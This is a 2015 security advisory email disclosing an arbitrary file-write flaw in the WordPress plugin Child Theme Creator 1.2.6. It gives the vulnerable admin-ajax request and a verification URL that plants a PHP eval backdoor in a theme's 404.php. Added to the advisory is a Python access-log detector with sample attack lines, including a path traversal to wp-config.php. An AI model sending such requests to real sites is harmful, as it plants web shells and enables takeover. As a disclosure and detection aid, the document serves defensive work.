Subject: Arbitrary file modification in Child Theme Creator by Orbisius 1.2.6
Date: Wed, 8 Jul 2015 11:14:39 +0200

Hello,

Plugin: Child Theme Creator by Orbisius 1.2.6 https://wordpress.org/plugins/orbisius-child-theme-creator/

Remote authenticated users can write arbitrary content to existing files in the theme
directory.

1. Arbitrary file modification (orbisius_ctc_theme_editor_manage_file()).

Method: GET
URL: http://localhost/wp-admin/admin-ajax.php?action=orbisius_ctc_theme_editor_ajax&sub_cmd=save_file&theme_1=twentythirteen&theme_1_file=404.php&theme_1_file_contents=NEW_FILE_CONTENT
Vulnerable parameters: theme_1, theme_1_file, theme_1_file_contents

Example PHP callstack:
  orbisius_ctc_theme_editor_ajax   [/orbisius-child-theme-creator/orbisius-child-theme-creator.php:2219]
  orbisius_ctc_theme_editor_manage_file   [/orbisius-child-theme-creator/orbisius-child-theme-creator.php:2494]

Verification:

Putting a backdoor in /wordpress/wp-content/themes/twentythirteen/404.php

http://localhost/wp-admin/admin-ajax.php?action=orbisius_ctc_theme_editor_ajax&sub_cmd=save_file&theme_1=twentythirteen&theme_1_file=404.php&theme_1_file_contents=<?php eval($_GET['e']);
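For defenders, the request pattern above is easy to pick out of web server access logs. The following detector is an added example, not code from the advisory or the plugin; it runs over constructed Apache-style log lines and flags save_file calls to the plugin's admin-ajax action, plus path traversal in theme_1_file and PHP code in theme_1_file_contents:

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). The first mirrors the
# request from the advisory, the second writes outside the theme directory,
# the third is a benign admin-ajax call.
SAMPLE_LOG = """\
10.0.0.5 - - [08/Jul/2015:11:14:39 +0200] "GET /wp-admin/admin-ajax.php?action=orbisius_ctc_theme_editor_ajax&sub_cmd=save_file&theme_1=twentythirteen&theme_1_file=404.php&theme_1_file_contents=%3C%3Fphp%20eval%28%24_GET%5B%27e%27%5D%29%3B HTTP/1.1" 200 12
10.0.0.7 - - [08/Jul/2015:11:20:01 +0200] "GET /wp-admin/admin-ajax.php?action=orbisius_ctc_theme_editor_ajax&sub_cmd=save_file&theme_1=twentythirteen&theme_1_file=..%2F..%2Fwp-config.php&theme_1_file_contents=x HTTP/1.1" 200 12
10.0.0.9 - - [08/Jul/2015:11:21:05 +0200] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40
"""

# Common log format: client ip, ident, user, [timestamp], "METHOD target PROTOCOL"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+"'
)
PHP_CODE_RE = re.compile(r"<\?php|eval\s*\(|base64_decode\s*\(", re.I)


def classify(line):
    """Return a list of finding strings for one access-log line ([] if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return []
    q = parse_qs(url.query)  # percent-decodes values for us
    if q.get("action") != ["orbisius_ctc_theme_editor_ajax"]:
        return []
    findings = []
    if q.get("sub_cmd") == ["save_file"]:
        findings.append("theme file write via save_file")
        fname = q.get("theme_1_file", [""])[0]
        if ".." in fname or fname.startswith("/"):
            findings.append("path traversal in theme_1_file")
        if PHP_CODE_RE.search(q.get("theme_1_file_contents", [""])[0]):
            findings.append("PHP code in theme_1_file_contents")
    return findings


def scan(log_text):
    """Return [(client_ip, findings)] for every flagged line in log_text."""
    hits = []
    for line in log_text.splitlines():
        findings = classify(line)
        if findings:
            hits.append((LOG_RE.match(line).group("ip"), findings))
    return hits


if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, "->", "; ".join(findings))
```

Any save_file hit from a user who should not be editing themes is worth a follow-up, since the advisory shows the write succeeds for ordinary authenticated users.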


--
Regards,
Marcin Probola,